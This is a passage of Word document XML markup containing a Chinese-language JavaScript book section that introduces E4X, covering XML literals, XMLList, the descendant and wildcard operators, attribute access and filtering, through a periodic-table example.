        <w:t>运算的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>"xml"</w:t>
      </w:r>
      <w:r>
        <w:t>。在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中（参照第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章），</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>（文档对象模型）对象没有任何关系，理解这一点非常重要。</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>标准也针对</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>表示方式</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>之间的转换做了规定，这个规定是可选的，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>并没有实现它们之间的转换。这也是</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>更适用于服务器端编程的原因。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节会给出</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>的一个快速入门教程，而不会进行更深入的讲解。</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>列表对象的很多方法本书中并未介绍。第四部分也不会对其进行讲解，如果读者</w:t>
      </w:r>
      <w:r>
        <w:t>希望进一步了解</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>，可以参照官方文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>只定义了很少的新语言语法。最显著的新语法当属将</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标签引入</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言中。可以在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中直接书写</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标签直接量，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pt=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>periodictable</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="1"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Hydrogen</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="2"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Helium</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="3"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Li</w:t>
      </w:r>
      <w:r>
        <w:t>thium</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/periodictable</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>给这个表格添加一个新元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.element+=</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="4"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Beryllium</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>直接量语法中使用花括号作为转义字符，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>中嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式。例如，这里是另外一种创建</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt=</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>periodictable</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/periodictable</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空表格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>elements=["Hydrogen","Helium","Lithium"];//</w:t>
      </w:r>
      <w:r>
        <w:t>待添加的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用数组元素创建</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var n=0;n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>elements.length;n++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.element+=</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id={n+1}</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>{elements[n]}</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</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除了使用直接量语法，我们也可以将字符串解析成</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>。下面的代码为上段代码创建的节点增加了一个新元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.element+=new XML('</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element i</w:t>
      </w:r>
      <w:r>
        <w:t>d="5"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Boron</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当涉及</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>片段的时候，使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLList()</w:t>
      </w:r>
      <w:r>
        <w:t>替换</w:t>
      </w:r>
      <w:r>
        <w:t>XML()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.element+=new XMLList('</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="6"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Carbon</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>'+'</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="7"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Nitrogen</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>提供了一些显而易见的语法用以访问所创建的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elements=pt.element;/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>得到所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签组成的一个列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var names=pt.element.name;//</w:t>
      </w:r>
      <w:r>
        <w:t>得到所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的一个列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=names[0];//"Hydrogen"</w:t>
      </w:r>
      <w:r>
        <w:t>（氢），</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个标签的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>同样为操作</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象提供了语法支持，点点（</w:t>
      </w:r>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:t>）运算符是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后代运算符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>descendant operator</w:t>
      </w:r>
      <w:r>
        <w:t>），可以用它替换普通的点（</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>）成员访问运算符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>另一种得到所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签对应列表的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var names2=pt..name;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>甚至定义了通配符运算：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>得到所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的所有子节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这也是得到所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签对应列表的另外一种方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var names3=pt.element.*;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>中使用字符</w:t>
      </w:r>
      <w:r>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>来区分属性名和标签名（从</w:t>
      </w:r>
      <w:r>
        <w:t>XPath</w:t>
      </w:r>
      <w:r>
        <w:t>中借用过来的语法）。比如，可以这样来获得一个属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"</w:t>
      </w:r>
      <w:r>
        <w:t>氮</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的原子序数是多少</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var atomicNumber=pt.element[1].@id;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用通配符来获得属性名</w:t>
      </w:r>
      <w:r>
        <w:t>@*</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获得所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的所有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>atomicNums=pt.element.@*;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>甚至包含了一种强大且极其简洁的语法用来对列表进行过滤，过滤条件可以是任意谓词表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素组成的一个列表进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>过滤出那些</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性小于</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lightElements=pt.element.(@id</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3);//</w:t>
      </w:r>
      <w:r>
        <w:t>对所有的</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的列表进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>过滤出那些</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>开始的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后得到过滤后元素的＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bElementNames=pt.element.(n</w:t>
      </w:r>
      <w:r>
        <w:t>ame.charAt(0)=='B').name;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>11.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节讲到</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环是非常有用的，但在</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>标准中对</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环有了新的定义，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>来遍历</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
